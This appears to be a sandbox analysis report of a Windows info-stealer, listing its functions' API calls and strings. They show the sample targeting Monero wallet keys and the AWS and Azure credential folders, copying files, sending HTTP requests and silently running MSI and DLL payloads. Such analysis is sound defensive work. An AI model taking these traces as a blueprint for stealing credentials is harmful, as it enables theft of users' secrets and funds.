                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008FE5D0,00000000,?,008F9FF8,00000000,?,00E31A1C), ref: 00E15E71
                                • lstrlen.KERNEL32(00000000), ref: 00E15E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E15E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E15E9A
                                • lstrlen.KERNEL32(00000000), ref: 00E15EAF
                                • lstrlen.KERNEL32(00000000), ref: 00E15ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E15EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00E15F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E15F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E15F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00E15FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00E15FBD
                                • HttpOpenRequestA.WININET(00000000,008FE550,?,008FDC58,00000000,00000000,00400100,00000000), ref: 00E15BF8
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • InternetCloseHandle.WININET(00000000), ref: 00E15FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 7d35bbfc326bdc5d61d19b5e95c9fed2c922752871bcdabf0c286eb6c95b18ef
                                • Instruction ID: c3f0bc5f589902016cde808b7b2fccacba6a8743b4be554eee3637f7fdd194f3
                                • Opcode Fuzzy Hash: 7d35bbfc326bdc5d61d19b5e95c9fed2c922752871bcdabf0c286eb6c95b18ef
                                • Instruction Fuzzy Hash: 79120172920128ABDB19EBA0EC99FEE73B8BF54700F5451A9F10673091DF702A49CF65
                                Function 00E1CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E28B60: GetSystemTime.KERNEL32(00E30E1A,008FA028,00E305AE,?,?,00E113F9,?,0000001A,00E30E1A,00000000,?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E28B86
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E1D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E1D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D208
                                • lstrcat.KERNEL32(?,00E31478), ref: 00E1D217
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D22A
                                • lstrcat.KERNEL32(?,00E3147C), ref: 00E1D239
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D24C
                                • lstrcat.KERNEL32(?,00E31480), ref: 00E1D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D26E
                                • lstrcat.KERNEL32(?,00E31484), ref: 00E1D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D290
                                • lstrcat.KERNEL32(?,00E31488), ref: 00E1D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D2B2
                                • lstrcat.KERNEL32(?,00E3148C), ref: 00E1D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D2D4
                                • lstrcat.KERNEL32(?,00E31490), ref: 00E1D2E3
                                  • Part of subcall function 00E2A820: lstrlen.KERNEL32(00E14F05,?,?,00E14F05,00E30DDE), ref: 00E2A82B
                                  • Part of subcall function 00E2A820: lstrcpy.KERNEL32(00E30DDE,00000000), ref: 00E2A885
                                • lstrlen.KERNEL32(?), ref: 00E1D32A
                                • lstrlen.KERNEL32(?), ref: 00E1D339
                                  • Part of subcall function 00E2AA70: StrCmpCA.SHLWAPI(008F8980,00E1A7A7,?,00E1A7A7,008F8980), ref: 00E2AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00E1D3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: d0c1c996a35a02831ea659f7ab12bdff4efff06423804b5f6f79c583c587f019
                                • Instruction ID: 98603760e6e917b905bc192cede0e3a4b7fffc9aa5e0feff08a3e5a2c23f1a7d
                                • Opcode Fuzzy Hash: d0c1c996a35a02831ea659f7ab12bdff4efff06423804b5f6f79c583c587f019
                                • Instruction Fuzzy Hash: E9E13372910218EBCB18EBA0ED9AEEE73B8BF54300F145168F147B7095DE35AE45CB61
                                Function 00E1C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,008FCF90,00000000,?,00E3144C,00000000,?,?), ref: 00E1CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E1CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00E1CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E1CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E1CAD9
                                • StrStrA.SHLWAPI(?,008FCE40,00E30B52), ref: 00E1CAF7
                                • StrStrA.SHLWAPI(00000000,008FCF30), ref: 00E1CB1E
                                • StrStrA.SHLWAPI(?,008FD758,00000000,?,00E31458,00000000,?,00000000,00000000,?,008F8970,00000000,?,00E31454,00000000,?), ref: 00E1CCA2
                                • StrStrA.SHLWAPI(00000000,008FD698), ref: 00E1CCB9
                                  • Part of subcall function 00E1C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E1C871
                                  • Part of subcall function 00E1C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E1C87C
                                • StrStrA.SHLWAPI(?,008FD698,00000000,?,00E3145C,00000000,?,00000000,008F89D0), ref: 00E1CD5A
                                • StrStrA.SHLWAPI(00000000,008F8B10), ref: 00E1CD71
                                  • Part of subcall function 00E1C820: lstrcat.KERNEL32(?,00E30B46), ref: 00E1C943
                                  • Part of subcall function 00E1C820: lstrcat.KERNEL32(?,00E30B47), ref: 00E1C957
                                  • Part of subcall function 00E1C820: lstrcat.KERNEL32(?,00E30B4E), ref: 00E1C978
                                • lstrlen.KERNEL32(00000000), ref: 00E1CE44
                                • CloseHandle.KERNEL32(00000000), ref: 00E1CE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 625701f6429e6530bab757ef33f6612e8e0ce0f3a2594f0dc8075cbd154bc1c6
                                • Instruction ID: 6e63e562a5a58f8eb6ea1cd82ddb7069776eb550ada0de4dfed5e94fce946b70
                                • Opcode Fuzzy Hash: 625701f6429e6530bab757ef33f6612e8e0ce0f3a2594f0dc8075cbd154bc1c6
                                • Instruction Fuzzy Hash: 7AE12172900118ABCB18EBA0EC95FEEB7B8BF54300F045169F10777191DF746A4ACB61
                                Function 00E28320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • RegOpenKeyExA.ADVAPI32(00000000,008FABA0,00000000,00020019,00000000,00E305B6), ref: 00E283A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E28426
                                • wsprintfA.USER32 ref: 00E28459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E2847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E2848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E28499
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 6343a5de609a5e8cf3f5709934b5488e3a894a7fcbed24cf8262bde53f008b82
                                • Instruction ID: e8922724ebb926f69e93992e6f630f99a1e70de8d676e8fe75f7c1e06470932e
                                • Opcode Fuzzy Hash: 6343a5de609a5e8cf3f5709934b5488e3a894a7fcbed24cf8262bde53f008b82
                                • Instruction Fuzzy Hash: AC811C7191122CEBDB28DF50DD95FEAB7B8BF48700F049299E10AA6140DF756B85CFA0
                                Function 00E24D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E28DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00E24DCD
                                  • Part of subcall function 00E24910: wsprintfA.USER32 ref: 00E2492C
                                  • Part of subcall function 00E24910: FindFirstFileA.KERNEL32(?,?), ref: 00E24943
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00E24E59
                                  • Part of subcall function 00E24910: StrCmpCA.SHLWAPI(?,00E30FDC), ref: 00E24971
                                  • Part of subcall function 00E24910: StrCmpCA.SHLWAPI(?,00E30FE0), ref: 00E24987
                                  • Part of subcall function 00E24910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E24B7D
                                  • Part of subcall function 00E24910: FindClose.KERNEL32(000000FF), ref: 00E24B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E24EE5
                                  • Part of subcall function 00E24910: wsprintfA.USER32 ref: 00E249B0
                                  • Part of subcall function 00E24910: StrCmpCA.SHLWAPI(?,00E308D2), ref: 00E249C5
                                  • Part of subcall function 00E24910: wsprintfA.USER32 ref: 00E249E2
                                  • Part of subcall function 00E24910: PathMatchSpecA.SHLWAPI(?,?), ref: 00E24A1E
                                  • Part of subcall function 00E24910: lstrcat.KERNEL32(?,008FE520), ref: 00E24A4A
                                  • Part of subcall function 00E24910: lstrcat.KERNEL32(?,00E30FF8), ref: 00E24A5C
                                  • Part of subcall function 00E24910: lstrcat.KERNEL32(?,?), ref: 00E24A70
                                  • Part of subcall function 00E24910: lstrcat.KERNEL32(?,00E30FFC), ref: 00E24A82
                                  • Part of subcall function 00E24910: lstrcat.KERNEL32(?,?), ref: 00E24A96
                                  • Part of subcall function 00E24910: CopyFileA.KERNEL32(?,?,00000001), ref: 00E24AAC
                                  • Part of subcall function 00E24910: DeleteFileA.KERNEL32(?), ref: 00E24B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 92846b344cce0758d07f1fb971ee43f3d65af86c8f87ed8dfc24091327c460e3
                                • Instruction ID: 82c2df51fa419c6d029ea8c22178afee5b47b14dc6c96175a6d22f20b46b1854
                                • Opcode Fuzzy Hash: 92846b344cce0758d07f1fb971ee43f3d65af86c8f87ed8dfc24091327c460e3
                                • Instruction Fuzzy Hash: 2241B3BAA4031467D724F760EC4BFEE3678AB64700F005598B689760C1EEB557C8CB92
                                Function 00E29010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E2906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: ddd4d03104bd2ef521882d9576e14b8ae26005e28e844c16688b279770c2eae2
                                • Instruction ID: 585a660152dc93de8b63d298dd1fc3c889340a3bbccc31f070da51e80d13bc9f
                                • Opcode Fuzzy Hash: ddd4d03104bd2ef521882d9576e14b8ae26005e28e844c16688b279770c2eae2
                                • Instruction Fuzzy Hash: CC71F1B1A10318EBDB14DFE4E989FEEB7B9BF48300F105608F655A7284DB399945CB60
                                Function 00E22E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00E231C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00E2335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00E234EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 673f67c83e5314106056ff474715f81a7c0f0731bb3e6bd9cbed441b17a39375
                                • Instruction ID: 9b65b05f83109186f9e1980a1d2c21326b706a84987478a3463c40fa4588cf4b
                                • Opcode Fuzzy Hash: 673f67c83e5314106056ff474715f81a7c0f0731bb3e6bd9cbed441b17a39375
                                • Instruction Fuzzy Hash: D5122F729001289BDB1DEBA0EC96FDEB7B8AF54300F445169F50676092EF742B4ACF51
                                Function 00E252C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E16280: InternetOpenA.WININET(00E30DFE,00000001,00000000,00000000,00000000), ref: 00E162E1
                                  • Part of subcall function 00E16280: StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E16303
                                  • Part of subcall function 00E16280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16335
                                  • Part of subcall function 00E16280: HttpOpenRequestA.WININET(00000000,GET,?,008FDC58,00000000,00000000,00400100,00000000), ref: 00E16385
                                  • Part of subcall function 00E16280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E163BF
                                  • Part of subcall function 00E16280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E163D1
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25318
                                • lstrlen.KERNEL32(00000000), ref: 00E2532F
                                  • Part of subcall function 00E28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00E25364
                                • lstrlen.KERNEL32(00000000), ref: 00E25383
                                • lstrlen.KERNEL32(00000000), ref: 00E253AE
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
